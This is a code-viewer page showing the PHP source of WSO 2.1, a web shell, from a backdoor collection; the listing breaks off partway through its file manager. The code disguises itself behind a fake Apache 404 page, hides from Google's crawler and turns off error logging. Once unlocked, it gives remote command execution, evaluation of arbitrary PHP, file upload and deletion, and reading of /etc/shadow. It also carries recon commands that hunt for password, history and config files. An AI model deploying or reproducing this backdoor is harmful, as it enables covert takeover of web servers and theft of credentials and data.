PageRenderTime 62ms CodeModel.GetById 25ms RepoModel.GetById 0ms app.codeStats 0ms

/Backdoors/PHP/404.php

http://web-malware-collection.googlecode.com/
PHP | 1400 lines | 1364 code | 31 blank | 5 comment | 243 complexity | 078c55ac475ab9e028f94f879f548bca MD5 | raw file

Large files files are truncated, but you can click here to view the full file

  1. <?php
  2. /* WSO 2.1 (Web Shell by pgems.in) */
  3. /*Subhashdasyam.com*/
  4. $auth_pass = "36028fcd4abb97e9e4f47d929ddc9980";
  5. $color = "#00ff00";
  6. $default_action = 'FilesMan';
  7. @define('SELF_PATH', __FILE__);
  8. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  9. header('HTTP/1.0 404 Not Found');
  10. exit;
  11. }
  12. @session_start();
  13. @error_reporting(0);
  14. @ini_set('error_log',NULL);
  15. @ini_set('log_errors',0);
  16. @ini_set('max_execution_time',0);
  17. @set_time_limit(0);
  18. @set_magic_quotes_runtime(0);
  19. @define('VERSION', '2.1');
  20. if( get_magic_quotes_gpc() ) {
  21. function stripslashes_array($array) {
  22. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  23. }
  24. $_POST = stripslashes_array($_POST);
  25. }
  26. function printLogin() {
  27. ?>
  28. <h1>Not Found</h1>
  29. <p>The requested URL was not found on this server.</p>
  30. <hr>
  31. <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
  32. <style>
  33. input { margin:0;background-color:#fff;border:1px solid #fff; }
  34. </style>
  35. <center>
  36. <form method=post>
  37. <input type=password name=pass>
  38. </form></center>
  39. <?php
  40. exit;
  41. }
  42. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  43. if( empty( $auth_pass ) ||
  44. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  45. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  46. else
  47. printLogin();
  48. if( strtolower( substr(PHP_OS,0,3) ) == "win" )
  49. $os = 'win';
  50. else
  51. $os = 'nix';
  52. $safe_mode = @ini_get('safe_mode');
  53. $disable_functions = @ini_get('disable_functions');
  54. $home_cwd = @getcwd();
  55. if( isset( $_POST['c'] ) )
  56. @chdir($_POST['c']);
  57. $cwd = @getcwd();
  58. if( $os == 'win') {
  59. $home_cwd = str_replace("\\", "/", $home_cwd);
  60. $cwd = str_replace("\\", "/", $cwd);
  61. }
  62. if( $cwd[strlen($cwd)-1] != '/' )
  63. $cwd .= '/';
  64. if($os == 'win')
  65. $aliases = array(
  66. "List Directory" => "dir",
  67. "Find index.php in current dir" => "dir /s /w /b index.php",
  68. "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
  69. "Show active connections" => "netstat -an",
  70. "Show running services" => "net start",
  71. "User accounts" => "net user",
  72. "Show computers" => "net view",
  73. "ARP Table" => "arp -a",
  74. "IP Configuration" => "ipconfig /all"
  75. );
  76. else
  77. $aliases = array(
  78. "List dir" => "ls -la",
  79. "list file attributes on a Linux second extended file system" => "lsattr -va",
  80. "show opened ports" => "netstat -an | grep -i listen",
  81. "Find" => "",
  82. "find all suid files" => "find / -type f -perm -04000 -ls",
  83. "find suid files in current dir" => "find . -type f -perm -04000 -ls",
  84. "find all sgid files" => "find / -type f -perm -02000 -ls",
  85. "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  86. "find config.inc.php files" => "find / -type f -name config.inc.php",
  87. "find config* files" => "find / -type f -name \"config*\"",
  88. "find config* files in current dir" => "find . -type f -name \"config*\"",
  89. "find all writable folders and files" => "find / -perm -2 -ls",
  90. "find all writable folders and files in current dir" => "find . -perm -2 -ls",
  91. "find all service.pwd files" => "find / -type f -name service.pwd",
  92. "find service.pwd files in current dir" => "find . -type f -name service.pwd",
  93. "find all .htpasswd files" => "find / -type f -name .htpasswd",
  94. "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  95. "find all .bash_history files" => "find / -type f -name .bash_history",
  96. "find .bash_history files in current dir" => "find . -type f -name .bash_history",
  97. "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  98. "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
  99. "Locate" => "",
  100. "locate httpd.conf files" => "locate httpd.conf",
  101. "locate vhosts.conf files" => "locate vhosts.conf",
  102. "locate proftpd.conf files" => "locate proftpd.conf",
  103. "locate psybnc.conf files" => "locate psybnc.conf",
  104. "locate my.conf files" => "locate my.conf",
  105. "locate admin.php files" =>"locate admin.php",
  106. "locate cfg.php files" => "locate cfg.php",
  107. "locate conf.php files" => "locate conf.php",
  108. "locate config.dat files" => "locate config.dat",
  109. "locate config.php files" => "locate config.php",
  110. "locate config.inc files" => "locate config.inc",
  111. "locate config.inc.php" => "locate config.inc.php",
  112. "locate config.default.php files" => "locate config.default.php",
  113. "locate config* files " => "locate config",
  114. "locate .conf files"=>"locate '.conf'",
  115. "locate .pwd files" => "locate '.pwd'",
  116. "locate .sql files" => "locate '.sql'",
  117. "locate .htpasswd files" => "locate '.htpasswd'",
  118. "locate .bash_history files" => "locate '.bash_history'",
  119. "locate .mysql_history files" => "locate '.mysql_history'",
  120. "locate .fetchmailrc files" => "locate '.fetchmailrc'",
  121. "locate backup files" => "locate backup",
  122. "locate dump files" => "locate dump",
  123. "locate priv files" => "locate priv"
  124. );
  125. function printHeader() {
  126. if(empty($_POST['charset']))
  127. $_POST['charset'] = "UTF-8";
  128. global $color;
  129. ?>
  130. <html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404 Not Found Shell V.<?=VERSION?>-SubhashDasyam.com</title>
  131. <style>
  132. body {background-color:#000;color:#fff;}
  133. body,td,th { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
  134. span,h1,a { color:<?=$color?> !important; }
  135. span { font-weight: bolder; }
  136. h1 { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; }
  137. div.content { padding: 5px;margin-left:5px;}
  138. a { text-decoration:none; }
  139. a:hover { background:#ff0000; }
  140. .ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
  141. .bigarea { width:100%;height:250px; }
  142. input, textarea, select { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; }
  143. form { margin:0px; }
  144. #toolsTbl { text-align:center; }
  145. .toolsInp { width: 80%; }
  146. .main th {text-align:left;}
  147. .main tr:hover{background-color:#5e5e5e;}
  148. .main td, th{vertical-align:middle;}
  149. pre {font-family:Courier,Monospace;}
  150. #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
  151. </style>
  152. <script>
  153. function set(a,c,p1,p2,p3,charset) {
  154. if(a != null)document.mf.a.value=a;
  155. if(c != null)document.mf.c.value=c;
  156. if(p1 != null)document.mf.p1.value=p1;
  157. if(p2 != null)document.mf.p2.value=p2;
  158. if(p3 != null)document.mf.p3.value=p3;
  159. if(charset != null)document.mf.charset.value=charset;
  160. }
  161. function g(a,c,p1,p2,p3,charset) {
  162. set(a,c,p1,p2,p3,charset);
  163. document.mf.submit();
  164. }
  165. function a(a,c,p1,p2,p3,charset) {
  166. set(a,c,p1,p2,p3,charset);
  167. var params = "ajax=true";
  168. for(i=0;i<document.mf.elements.length;i++)
  169. params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
  170. sr('<?=$_SERVER['REQUEST_URI'];?>', params);
  171. }
  172. function sr(url, params) {
  173. if (window.XMLHttpRequest) {
  174. req = new XMLHttpRequest();
  175. req.onreadystatechange = processReqChange;
  176. req.open("POST", url, true);
  177. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  178. req.send(params);
  179. }
  180. else if (window.ActiveXObject) {
  181. req = new ActiveXObject("Microsoft.XMLHTTP");
  182. if (req) {
  183. req.onreadystatechange = processReqChange;
  184. req.open("POST", url, true);
  185. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  186. req.send(params);
  187. }
  188. }
  189. }
  190. function processReqChange() {
  191. if( (req.readyState == 4) )
  192. if(req.status == 200) {
  193. //alert(req.responseText);
  194. var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
  195. var arr=reg.exec(req.responseText);
  196. eval(arr[2].substr(0, arr[1]));
  197. }
  198. else alert("Request error!");
  199. }
  200. </script>
  201. <head><body><div style="position:absolute;width:100%;top:0;left:0;">
  202. <form method=post name=mf style='display:none;'>
  203. <input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
  204. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
  205. <input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
  206. <input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
  207. <input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
  208. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
  209. </form>
  210. <?php
  211. $freeSpace = @diskfreespace($GLOBALS['cwd']);
  212. $totalSpace = @disk_total_space($GLOBALS['cwd']);
  213. $totalSpace = $totalSpace?$totalSpace:1;
  214. $release = @php_uname('r');
  215. $kernel = @php_uname('s');
  216. $millink='http://milw0rm.com/search.php?dong=';
  217. if( strpos('Linux', $kernel) !== false )
  218. $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
  219. else
  220. $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
  221. if(!function_exists('posix_getegid')) {
  222. $user = @get_current_user();
  223. $uid = @getmyuid();
  224. $gid = @getmygid();
  225. $group = "?";
  226. } else {
  227. $uid = @posix_getpwuid(@posix_geteuid());
  228. $gid = @posix_getgrgid(@posix_getegid());
  229. $user = $uid['name'];
  230. $uid = $uid['uid'];
  231. $group = $gid['name'];
  232. $gid = $gid['gid'];
  233. }
  234. $cwd_links = '';
  235. $path = explode("/", $GLOBALS['cwd']);
  236. $n=count($path);
  237. for($i=0;$i<$n-1;$i++) {
  238. $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
  239. for($j=0;$j<=$i;$j++)
  240. $cwd_links .= $path[$j].'/';
  241. $cwd_links .= "\")'>".$path[$i]."/</a>";
  242. }
  243. $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
  244. $opt_charsets = '';
  245. foreach($charsets as $item)
  246. $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
  247. $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
  248. if(!empty($GLOBALS['auth_pass']))
  249. $m['Logout'] = 'Logout';
  250. $m['Self remove'] = 'SelfRemove';
  251. $menu = '';
  252. foreach($m as $k => $v)
  253. $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
  254. $drives = "";
  255. if ($GLOBALS['os'] == 'win') {
  256. foreach( range('a','z') as $drive )
  257. if (is_dir($drive.':\\'))
  258. $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  259. }
  260. echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname
  261. User
  262. Php
  263. Hdd
  264. Cwd'.($GLOBALS['os'] == 'win'?'
  265. Drives':'').'</span></td>'.
  266. '<td>:<nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a></nobr>
  267. :'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )
  268. :'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=$color?><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'
  269. :'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)
  270. :'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a>
  271. :'.$drives.'</td>'.
  272. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select>
  273. <span>Server IP:</span>
  274. '.gethostbyname($_SERVER["HTTP_HOST"]).'
  275. <span>Client IP:</span>
  276. '.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
  277. '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
  278. }
  279. function printFooter() {
  280. $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
  281. ?>
  282. </div>
  283. <table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
  284. <tr>
  285. <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span>
  286. <input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
  287. <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span>
  288. <input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
  289. </tr>
  290. <tr>
  291. <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span>
  292. <input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
  293. <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span>
  294. <input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
  295. </tr>
  296. <tr>
  297. <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span>
  298. <input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
  299. <td><form method='post' ENCTYPE='multipart/form-data'>
  300. <input type=hidden name=a value='FilesMAn'>
  301. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
  302. <input type=hidden name=p1 value='uploadFile'>
  303. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
  304. <span>Upload file:</span>
  305. <input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
  306. </tr>
  307. </table>
  308. </div>
  309. </body></html>
  310. <?php
  311. }
  312. if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
  313. if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
  314. function ex($in) {
  315. $out = '';
  316. if(function_exists('exec')) {
  317. @exec($in,$out);
  318. $out = @join("\n",$out);
  319. }elseif(function_exists('passthru')) {
  320. ob_start();
  321. @passthru($in);
  322. $out = ob_get_clean();
  323. }elseif(function_exists('system')) {
  324. ob_start();
  325. @system($in);
  326. $out = ob_get_clean();
  327. }elseif(function_exists('shell_exec')) {
  328. $out = shell_exec($in);
  329. }elseif(is_resource($f = @popen($in,"r"))) {
  330. $out = "";
  331. while(!@feof($f))
  332. $out .= fread($f,1024);
  333. pclose($f);
  334. }
  335. return $out;
  336. }
  337. function viewSize($s) {
  338. if($s >= 1073741824)
  339. return sprintf('%1.2f', $s / 1073741824 ). ' GB';
  340. elseif($s >= 1048576)
  341. return sprintf('%1.2f', $s / 1048576 ) . ' MB';
  342. elseif($s >= 1024)
  343. return sprintf('%1.2f', $s / 1024 ) . ' KB';
  344. else
  345. return $s . ' B';
  346. }
  347. function perms($p) {
  348. if (($p & 0xC000) == 0xC000)$i = 's';
  349. elseif (($p & 0xA000) == 0xA000)$i = 'l';
  350. elseif (($p & 0x8000) == 0x8000)$i = '-';
  351. elseif (($p & 0x6000) == 0x6000)$i = 'b';
  352. elseif (($p & 0x4000) == 0x4000)$i = 'd';
  353. elseif (($p & 0x2000) == 0x2000)$i = 'c';
  354. elseif (($p & 0x1000) == 0x1000)$i = 'p';
  355. else $i = 'u';
  356. $i .= (($p & 0x0100) ? 'r' : '-');
  357. $i .= (($p & 0x0080) ? 'w' : '-');
  358. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  359. $i .= (($p & 0x0020) ? 'r' : '-');
  360. $i .= (($p & 0x0010) ? 'w' : '-');
  361. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  362. $i .= (($p & 0x0004) ? 'r' : '-');
  363. $i .= (($p & 0x0002) ? 'w' : '-');
  364. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  365. return $i;
  366. }
  367. function viewPermsColor($f) {
  368. if (!@is_readable($f))
  369. return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
  370. elseif (!@is_writable($f))
  371. return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
  372. else
  373. return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';
  374. }
  375. if(!function_exists("scandir")) {
  376. function scandir($dir) {
  377. $dh = opendir($dir);
  378. while (false !== ($filename = readdir($dh))) {
  379. $files[] = $filename;
  380. }
  381. return $files;
  382. }
  383. }
  384. function which($p) {
  385. $path = ex('which '.$p);
  386. if(!empty($path))
  387. return $path;
  388. return false;
  389. }
  390. function actionSecInfo() {
  391. printHeader();
  392. echo '<h1>Server security information</h1><div class=content>';
  393. function showSecParam($n, $v) {
  394. $v = trim($v);
  395. if($v) {
  396. echo '<span>'.$n.': </span>';
  397. if(strpos($v, "\n") === false)
  398. echo $v.'
  399. ';
  400. else
  401. echo '<pre class=ml1>'.$v.'</pre>';
  402. }
  403. }
  404. showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
  405. showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
  406. showSecParam('Open base dir', @ini_get('open_basedir'));
  407. showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  408. showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  409. showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
  410. $temp=array();
  411. if(function_exists('mysql_get_client_info'))
  412. $temp[] = "MySql (".mysql_get_client_info().")";
  413. if(function_exists('mssql_connect'))
  414. $temp[] = "MSSQL";
  415. if(function_exists('pg_connect'))
  416. $temp[] = "PostgreSQL";
  417. if(function_exists('oci_connect'))
  418. $temp[] = "Oracle";
  419. showSecParam('Supported databases', implode(', ', $temp));
  420. echo '
  421. ';
  422. if( $GLOBALS['os'] == 'nix' ) {
  423. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  424. $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
  425. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  426. showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
  427. showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
  428. showSecParam('OS version', @file_get_contents('/proc/version'));
  429. showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
  430. if(!$GLOBALS['safe_mode']) {
  431. echo '
  432. ';
  433. $temp=array();
  434. foreach ($userful as $item)
  435. if(which($item)){$temp[]=$item;}
  436. showSecParam('Userful', implode(', ',$temp));
  437. $temp=array();
  438. foreach ($danger as $item)
  439. if(which($item)){$temp[]=$item;}
  440. showSecParam('Danger', implode(', ',$temp));
  441. $temp=array();
  442. foreach ($downloaders as $item)
  443. if(which($item)){$temp[]=$item;}
  444. showSecParam('Downloaders', implode(', ',$temp));
  445. echo '
  446. ';
  447. showSecParam('Hosts', @file_get_contents('/etc/hosts'));
  448. showSecParam('HDD space', ex('df -h'));
  449. showSecParam('Mount options', @file_get_contents('/etc/fstab'));
  450. }
  451. } else {
  452. showSecParam('OS Version',ex('ver'));
  453. showSecParam('Account Settings',ex('net accounts'));
  454. showSecParam('User Accounts',ex('net user'));
  455. }
  456. echo '</div>';
  457. printFooter();
  458. }
  459. function actionPhp() {
  460. if( isset($_POST['ajax']) ) {
  461. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  462. ob_start();
  463. eval($_POST['p1']);
  464. $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  465. echo strlen($temp), "\n", $temp;
  466. exit;
  467. }
  468. printHeader();
  469. if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
  470. echo '<h1>PHP info</h1><div class=content>';
  471. ob_start();
  472. phpinfo();
  473. $tmp = ob_get_clean();
  474. $tmp = preg_replace('!body {.*}!msiU','',$tmp);
  475. $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
  476. $tmp = preg_replace('!h1!msiU','h2',$tmp);
  477. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  478. $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
  479. echo $tmp;
  480. echo '</div>
  481. ';
  482. }
  483. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  484. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  485. echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
  486. echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
  487. if(!empty($_POST['p1'])) {
  488. ob_start();
  489. eval($_POST['p1']);
  490. echo htmlspecialchars(ob_get_clean());
  491. }
  492. echo '</pre></div>';
  493. printFooter();
  494. }
  495. function actionFilesMan() {
  496. printHeader();
  497. echo '<h1>File manager</h1><div class=content>';
  498. if(isset($_POST['p1'])) {
  499. switch($_POST['p1']) {
  500. case 'uploadFile':
  501. if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
  502. echo "Can't upload file!";
  503. break;
  504. break;
  505. case 'mkdir':
  506. if(!@mkdir($_POST['p2']))
  507. echo "Can't create new dir";
  508. break;
  509. case 'delete':
  510. function deleteDir($path) {
  511. $path = (substr($path,-1)=='/') ? $path:$path.'/';
  512. $dh = opendir($path);
  513. while ( ($item = readdir($dh) ) !== false) {
  514. $item = $path.$item;
  515. if ( (basename($item) == "..") || (basename($item) == ".") )
  516. continue;
  517. $type = filetype($item);
  518. if ($type == "dir")
  519. deleteDir($item);
  520. else
  521. @unlink($item);
  522. }
  523. closedir($dh);
  524. rmdir($path);
  525. }
  526. if(is_array(@$_POST['f']))
  527. foreach($_POST['f'] as $f) {
  528. $f = urldecode($f);
  529. if(is_dir($f))
  530. deleteDir($f);
  531. else
  532. @unlink($f);
  533. }
  534. break;
  535. case 'paste':
  536. if($_SESSION['act'] == 'copy') {
  537. function copy_paste($c,$s,$d){
  538. if(is_dir($c.$s)){
  539. mkdir($d.$s);
  540. $h = opendir($c.$s);
  541. while (($f = readdir($h)) !== false)
  542. if (($f != ".") and ($f != "..")) {
  543. copy_paste($c.$s.'/',$f, $d.$s.'/');
  544. }
  545. } elseif(is_file($c.$s)) {
  546. @copy($c.$s, $d.$s);
  547. }
  548. }
  549. foreach($_SESSION['f'] as $f)
  550. copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
  551. } elseif($_SESSION['act'] == 'move') {
  552. function move_paste($c,$s,$d){
  553. if(is_dir($c.$s)){
  554. mkdir($d.$s);
  555. $h = opendir($c.$s);
  556. while (($f = readdir($h)) !== false)
  557. if (($f != ".") and ($f != "..")) {
  558. copy_paste($c.$s.'/',$f, $d.$s.'/');
  559. }
  560. } elseif(is_file($c.$s)) {
  561. @copy($c.$s, $d.$s);
  562. }
  563. }
  564. foreach($_SESSION['f'] as $f)
  565. @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
  566. }
  567. unset($_SESSION['f']);
  568. break;
  569. default:
  570. if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
  571. $_SESSION['act'] = @$_POST['p1'];
  572. $_SESSION['f'] = @$_POST['f'];
  573. foreach($_SESSION['f'] as $k => $f)
  574. $_SESSION['f'][$k] = urldecode($f);
  575. $_SESSION['cwd'] = @$_POST['c'];
  576. }
  577. break;
  578. }
  579. echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
  580. }
  581. $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
  582. if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
  583. global $sort;
  584. $sort = array('name', 1);
  585. if(!empty($_POST['p1'])) {
  586. if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
  587. $sort = array($match[1], (int)$match[2]);
  588. }
  589. ?>
  590. <script>
  591. function sa() {
  592. for(i=0;i<document.files.elements.length;i++)
  593. if(document.files.elements[i].type == 'checkbox')
  594. document.files.elements[i].checked = document.files.elements[0].checked;
  595. }
  596. </script>
  597. <table width='100%' class='main' cellspacing='0' cellpadding='2'>
  598. <form name=files method=post>
  599. <?php
  600. echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
  601. $dirs = $files = $links = array();
  602. $n = count($dirContent);
  603. for($i=0;$i<$n;$i++) {
  604. $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
  605. $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
  606. $tmp = array('name' => $dirContent[$i],
  607. 'path' => $GLOBALS['cwd'].$dirContent[$i],
  608. 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
  609. 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
  610. 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
  611. 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
  612. 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
  613. );
  614. if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
  615. $files[] = array_merge($tmp, array('type' => 'file'));
  616. elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
  617. $links[] = array_merge($tmp, array('type' => 'link'));
  618. elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
  619. $dirs[] = array_merge($tmp, array('type' => 'dir'));
  620. }
  621. $GLOBALS['sort'] = $sort;
  622. function cmp($a, $b) {
  623. if($GLOBALS['sort'][0] != 'size')
  624. return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
  625. else
  626. return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
  627. }
  628. usort($files, "cmp");
  629. usort($dirs, "cmp");
  630. usort($links, "cmp");
  631. $files = array_merge($dirs, $links, $files);
  632. $l = 0;
  633. foreach($files as $f) {
  634. echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
